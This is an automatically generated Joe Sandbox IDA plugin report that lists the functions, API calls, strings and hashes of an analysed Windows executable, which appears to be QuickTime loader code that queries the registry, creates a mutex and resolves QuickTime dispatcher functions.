Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: _strcat$___shr_12
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 1152255961-4131533671
Opcode ID: 8696233bd27a0116636cddc97e8d704f05756c515fca90df66b9de04f53f447f
Instruction ID: 1122645ec2f920cde6a1877e67f72933b3ff2f2e70d4eb5387ac2172a23375a5
Opcode Fuzzy Hash: 8696233bd27a0116636cddc97e8d704f05756c515fca90df66b9de04f53f447f
Instruction Fuzzy Hash: DF913831C0469ADDCF11CBA8C8447EFBBB4AF15314F19459BD851EB282D3788A86C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A190 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(QuickTime.qts,?,00000104,00000000), ref: 0040A1C2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040A1DE
_strncpy.LIBCMT ref: 0040A20E

Part of subcall function 0040A0E0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000001,?,?), ref: 0040A10C
Part of subcall function 0040A0E0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,0040A239,00000000), ref: 0040A12E
Part of subcall function 0040A0E0: RegCloseKey.ADVAPI32(?), ref: 0040A186

GetSystemDirectoryA.KERNEL32(?,?), ref: 0040A28C

Part of subcall function 0040F34B: GetFileAttributesA.KERNEL32(00000000,0040A29E,?,00000000), ref: 0040F34F
Part of subcall function 0040F34B: GetLastError.KERNEL32 ref: 0040F35A

Strings

QuickTime.qts folder, xrefs: 0040A25B
QuickTime.qts, xrefs: 0040A1BD
Software\Apple Computer, Inc.\QuickTime, xrefs: 0040A22F, 0040A260
QTSysDir, xrefs: 0040A22A

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: FileModule$AttributesCloseDirectoryErrorHandleLastNameOpenQuerySystemValue_strncpy
String ID: QTSysDir$QuickTime.qts$QuickTime.qts folder$Software\Apple Computer, Inc.\QuickTime
API String ID: 951529944-1843814562
Opcode ID: 47c9b2d4c779e4d035cd102be299a046e6fdf9751cbd9b36926a3ed7c05dbfc0
Instruction ID: 104e764b7200e05bcd1ecc8c9a9b43c6ad44494fdb04908ef22aeb19c9e6402d
Opcode Fuzzy Hash: 47c9b2d4c779e4d035cd102be299a046e6fdf9751cbd9b36926a3ed7c05dbfc0
Instruction Fuzzy Hash: C941F4305083825FE7219B248C45BE77B945F52340F1844BEE8C4AB3C1FA7E9998C3AA

Uniqueness

Uniqueness Score: -1.00%

Function 00409050 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00409057
wsprintfA.USER32 ref: 00409068
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0040907A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00409089
FreeLibrary.KERNEL32(00000000), ref: 004090D8
ReleaseMutex.KERNEL32(00000000), ref: 004090E3
CloseHandle.KERNEL32(00000000), ref: 004090EA

Strings

QTMLInitTermMutex%lx, xrefs: 00409062

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Mutex$CloseCreateCurrentFreeHandleLibraryObjectProcessReleaseSingleWaitwsprintf
String ID: QTMLInitTermMutex%lx
API String ID: 4225096208-100935175
Opcode ID: 4de745b82f0d2fc828a677d71f76e16e51066522adb2f3288d2682d805bba273
Instruction ID: 33db166c0eea50095c6a2ce2d3fc3dee7d96d19818f17dc88f8f4101b8eec90f
Opcode Fuzzy Hash: 4de745b82f0d2fc828a677d71f76e16e51066522adb2f3288d2682d805bba273
Instruction Fuzzy Hash: 9C012D71541A15ABD3119F24ED09BCB3AA4FB0C700F14C23EE559E62A1EF7889058BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00404F00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404D00: GetVersionExA.KERNEL32 ref: 00404D24

lstrlenA.KERNEL32(?), ref: 00404F3F
lstrcatA.KERNEL32(00418370,00418370), ref: 00404F5C
lstrcatA.KERNEL32(00418364,00418364), ref: 00404F68
lstrcatA.KERNEL32(00418370,00418370), ref: 00404F74
lstrcatA.KERNEL32(00418350,00418350), ref: 00404F80
DeleteFileA.KERNEL32(?), ref: 00404F87

Strings

\, xrefs: 00404F45

Memory Dump Source

Source File: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: lstrcat$DeleteFileVersionlstrlen
String ID: \
API String ID: 4030070444-2967466578
Opcode ID: 2cf9f3c4697e5f59718db4088b76e476623281f84d4dd1007256931596c74c89
Instruction ID: 79fe86debce27f1de6f0c999bf00a401947c29f64bccf36f07804adbf224f81a
Opcode Fuzzy Hash: 2cf9f3c4697e5f59718db4088b76e476623281f84d4dd1007256931596c74c89
Instruction Fuzzy Hash: 19019BB5518305BAD210E760DD46FDBBBEC9F84700F448C2EBA99960C0EF79D544CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00416787 Relevance: 12.2, APIs: 8, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00419AB0,00000044,00414D35,?,00000000,?,?,00000000,00000000,00419410,0000001C,00410CD0,00000001,?), ref: 004167D0
GetCPInfo.KERNEL32(?,?), ref: 004167E7
_strlen.LIBCMT ref: 0041680B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0041682C

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID:
API String ID: 1335377746-0
Opcode ID: bda5392393f2c6c8403e799d5822149df02a3e3126baf7ded6a23a751373c168
Instruction ID: 0f04cface22ce7c29e43e24a71ebcc2c03ea612cc3f35c65c90d937ec6daa45d
Opcode Fuzzy Hash: bda5392393f2c6c8403e799d5822149df02a3e3126baf7ded6a23a751373c168
Instruction Fuzzy Hash: 8F516C71901218AFCF209FAADC849EFBFB9EF44754B21452EF415A6260D7358981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004125F7 Relevance: 12.1, APIs: 8, Instructions: 131COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(771C1100,00000000,?,?,?,?,0040F1D2,?,004189C0,00000060), ref: 00412613
GetLastError.KERNEL32(?,?,?,?,0040F1D2,?,004189C0,00000060), ref: 00412627
GetEnvironmentStringsW.KERNEL32(771C1100,00000000,?,?,?,?,0040F1D2,?,004189C0,00000060), ref: 00412649
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,771C1100,00000000,?,?,?,?,0040F1D2), ref: 0041267D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0040F1D2,?,004189C0,00000060), ref: 0041269F
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0040F1D2,?,004189C0,00000060), ref: 004126B8
GetEnvironmentStrings.KERNEL32(771C1100,00000000,?,?,?,?,0040F1D2,?,004189C0,00000060), ref: 004126CE
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041270A

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
String ID:
API String ID: 883850110-0
Opcode ID: aa72f3ecd672bd467329ee2078eb239a23d0cf5e4178b805ddaeded1aacc2a2a
Instruction ID: ceb73bbd2abd4f4ac1073e29ba328e232d98e943488f57e222aa48bb2eddf772
Opcode Fuzzy Hash: aa72f3ecd672bd467329ee2078eb239a23d0cf5e4178b805ddaeded1aacc2a2a
Instruction Fuzzy Hash: A53159B22042196FC7207F759DC48FB7A9CEB18354716043FF542D3290D6A98CE586BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A310 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 0040A0E0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000001,?,?), ref: 0040A10C
Part of subcall function 0040A0E0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,0040A239,00000000), ref: 0040A12E
Part of subcall function 0040A0E0: RegCloseKey.ADVAPI32(?), ref: 0040A186

GetSystemDirectoryA.KERNEL32(?,?), ref: 0040A34E

Part of subcall function 0040A190: GetModuleHandleA.KERNEL32(QuickTime.qts,?,00000104,00000000), ref: 0040A1C2
Part of subcall function 0040A190: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040A1DE
Part of subcall function 0040A190: _strncpy.LIBCMT ref: 0040A20E

Strings

/, xrefs: 0040A3A1
QuickTime\, xrefs: 0040A428
QTExtDir, xrefs: 0040A328
\, xrefs: 0040A389
Software\Apple Computer, Inc.\QuickTime, xrefs: 0040A32D

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Module$CloseDirectoryFileHandleNameOpenQuerySystemValue_strncpy
String ID: /$QTExtDir$QuickTime\$Software\Apple Computer, Inc.\QuickTime$\
API String ID: 4224198847-3375700635
Opcode ID: e7c1a39f80f31d2cb4c202b78977e337c75c5aa287e2696fb60bdfa61debde4f
Instruction ID: 364fd3b204c1dd7330411665da041cb031982a894cb61dd61fe3118f2cbc591b
Opcode Fuzzy Hash: e7c1a39f80f31d2cb4c202b78977e337c75c5aa287e2696fb60bdfa61debde4f
Instruction Fuzzy Hash: 8B412C354083465FC7118F289868AE3BBD5AF96304F18C579DCD457382EA76D41EC35A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040BA8E
wsprintfA.USER32 ref: 0040BA9A
wsprintfA.USER32 ref: 0040BAB0
MessageBoxA.USER32(00000000,?,?,00000010), ref: 0040BAC6

Strings

QuickTime failed to initialize. Error # %ldPlease make sure QuickTime is properly installed on this computer., xrefs: 0040BA88
QuickTime Unavailable, xrefs: 0040BA94

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: wsprintf$Message
String ID: QuickTime Unavailable$QuickTime failed to initialize. Error # %ldPlease make sure QuickTime is properly installed on this computer.
API String ID: 386942524-2105048125
Opcode ID: 252adf5efd73c22e170c30de96f1756cd8a796c420074329fc4a04698a7d5e3d
Instruction ID: ee199dbade74e6c58b1d56c87e9df3df68788822ad619259339a5e2030cacf30
Opcode Fuzzy Hash: 252adf5efd73c22e170c30de96f1756cd8a796c420074329fc4a04698a7d5e3d
Instruction Fuzzy Hash: 3E11CAB26043046BD325EB54DC82FEB739CEF88700F440C2EF64996181EBB467448BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00404E50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00404D00: GetVersionExA.KERNEL32 ref: 00404D24

lstrlenA.KERNEL32(?), ref: 00404E99
lstrcatA.KERNEL32(?,00418370), ref: 00404EB6
lstrcatA.KERNEL32(?,00418364), ref: 00404EC2
lstrcatA.KERNEL32(?,00418370), ref: 00404ECE
lstrcatA.KERNEL32(?,00418350), ref: 00404EDA

Strings

\, xrefs: 00404E9F

Memory Dump Source

Source File: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: lstrcat$Versionlstrlen
String ID: \
API String ID: 3591958750-2967466578
Opcode ID: 651dc8a3961542d8e3f6fa0409a74a7952b1cce4f50f2cabddd797ef7950202e
Instruction ID: caed9a763d3f3c36cb846cc5758f9c8b08a23838fbe1f7e585e33828dd84733e
Opcode Fuzzy Hash: 651dc8a3961542d8e3f6fa0409a74a7952b1cce4f50f2cabddd797ef7950202e
Instruction Fuzzy Hash: 6811CAB65083047ED210D761DC46FDB7BACAFD4710F44882EBA98960C0DF79D544CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00408EF0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,_CallComponentFunctionWithStorage), ref: 00408F02
GetProcAddress.KERNEL32(00000000,_CallComponent), ref: 00408F19
GetProcAddress.KERNEL32(00000000,theQuickTimeDispatcher), ref: 00408F30

Strings

_CallComponent, xrefs: 00408F13
theQuickTimeDispatcher, xrefs: 00408F2A
_CallComponentFunctionWithStorage, xrefs: 00408EFC

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AddressProc
String ID: _CallComponent$_CallComponentFunctionWithStorage$theQuickTimeDispatcher
API String ID: 190572456-1580149822
Opcode ID: 09d808e97450b2dbb1d2c166b3f8c1dc8d18abe90f699a599eb9a135a551aea5
Instruction ID: 00fdf6ba1a11cf94093199fe872e228ce1e5c385b24b74b60c0ce5ca596eea00
Opcode Fuzzy Hash: 09d808e97450b2dbb1d2c166b3f8c1dc8d18abe90f699a599eb9a135a551aea5
Instruction Fuzzy Hash: FBF01CB19412169AD650DB74BD41BD73BA4E748740B00C13BE548D3294EF7898838FAC

Uniqueness

Uniqueness Score: -1.00%

Function 00414BB2 Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,004193E4,00000001,?,00419410,0000001C,00410CD0,00000001,?,00000100,?,00000000), ref: 00414BD6
GetLastError.KERNEL32 ref: 00414BE8
MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00419410,0000001C,00410CD0,00000001,?,00000100,?,00000000), ref: 00414C4A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00414CC8
GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00414CDA

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: d2e3bb3cc68d0bc0c5174c13ffddb2f024e0738cb3811f280e08f960a557b1db
Instruction ID: 83d654da050eba6bce92e1f2128ededb60df545f2ad209a46392ac1f838ed9b9
Opcode Fuzzy Hash: d2e3bb3cc68d0bc0c5174c13ffddb2f024e0738cb3811f280e08f960a557b1db
Instruction Fuzzy Hash: D841A471500219ABCF219F51EC85AEF3B75FB88750F25412AF915A7290D738C991CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E100 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E134
RegOpenKeyExA.ADVAPI32 ref: 0040E16C
RegCreateKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 0040E193
RegCreateKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E1C6

Strings

SOFTWARE\Classes, xrefs: 0040E15A

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Create$Open
String ID: SOFTWARE\Classes
API String ID: 2373840890-3345315260
Opcode ID: d5f1cdac7b7895c959157197bb627d8f8fe412c4ef274f132794f4dfb049c719
Instruction ID: d9384b503b908a519f735ea70184785b866944970a3cbec82d16732b8c3e9e9e
Opcode Fuzzy Hash: d5f1cdac7b7895c959157197bb627d8f8fe412c4ef274f132794f4dfb049c719
Instruction Fuzzy Hash: 80210E71209204AFD214DA55EC84EABBBEDEBCD765F50492DF948A3240C635ED09CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0040C480 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32 ref: 0040C4E5

Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?), ref: 0040E206
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32 ref: 0040E235
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?), ref: 0040E248

RegQueryValueExA.ADVAPI32 ref: 0040C52A

Strings

SOFTWARE\Apple Computer, Inc.\QuickTime, xrefs: 0040C491, 0040C4F6
Version, xrefs: 0040C51C
LastFileAssociationCheck, xrefs: 0040C4D7

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Open$QueryValue
String ID: LastFileAssociationCheck$SOFTWARE\Apple Computer, Inc.\QuickTime$Version
API String ID: 2123561561-1126707418
Opcode ID: fe208eeef491ba151c1cd3e69ef1daa660a65d58dc47100ba0b25be176a35a69
Instruction ID: eb06ce8dd85bbd294b27f4601735c98ae3146ae391439f5e489cc6918740238c
Opcode Fuzzy Hash: fe208eeef491ba151c1cd3e69ef1daa660a65d58dc47100ba0b25be176a35a69
Instruction Fuzzy Hash: C221AAB1504311AFD210DF55DC81E5BBBECEF88758F404A1EF548A2281D6B4E5058BEA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?), ref: 0040E206
RegOpenKeyExA.ADVAPI32 ref: 0040E235
RegOpenKeyExA.ADVAPI32(?,?,?,?,?), ref: 0040E248
RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,00000000,?,?), ref: 0040E267

Strings

SOFTWARE\Classes, xrefs: 0040E223

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Classes
API String ID: 71445658-3345315260
Opcode ID: 9145a55e0ce023b185bc7edbf77f0a53f3719583b7fdd1c0c41a77ca0d5bddca
Instruction ID: b4c707fd3286beac4da86803371346ad14913af92385341167a002a4e8fb8a76
Opcode Fuzzy Hash: 9145a55e0ce023b185bc7edbf77f0a53f3719583b7fdd1c0c41a77ca0d5bddca
Instruction Fuzzy Hash: 5A117732205301ABD610DA46EC80E6BBBECFBC9765F50096DF94853240C639ED18C776

Uniqueness

Uniqueness Score: -1.00%

Function 0040C560 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?), ref: 0040E206
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32 ref: 0040E235
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?), ref: 0040E248

RegQueryValueExA.ADVAPI32 ref: 0040C5B5
RegSetValueExA.ADVAPI32 ref: 0040C5FB

Strings

SOFTWARE\Apple Computer, Inc.\QuickTime, xrefs: 0040C571, 0040C5C9
Version, xrefs: 0040C5A7
LastFileAssociationCheck, xrefs: 0040C5ED

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

